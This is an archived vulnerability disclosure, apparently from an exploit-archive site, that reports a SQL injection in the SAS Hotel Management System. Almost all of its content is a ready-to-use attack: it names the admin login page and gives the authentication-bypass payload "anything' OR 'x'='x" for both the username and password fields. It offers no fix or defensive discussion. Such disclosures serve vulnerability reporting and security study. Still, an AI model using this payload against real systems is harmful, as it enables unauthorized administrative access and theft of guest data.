AOH :: HP Unsorted S :: TB11976.HTM

SAS Hotel Management System SQL Injection



SAS Hotel Management System SQL Injection
SAS Hotel Management System SQL Injection



__________________________

A R I A - S E CU R I T Y  
___________________________

SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp 


Explanation:

http://path/admin/admin.asp 

Username: anything' OR 'x'='x
password: anything' OR 'x'='x



Credits: Aria-Security Team
http://aria-security.net 
http://outlaw.Aria-Security.net/ [PERSONAL BLOG] 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.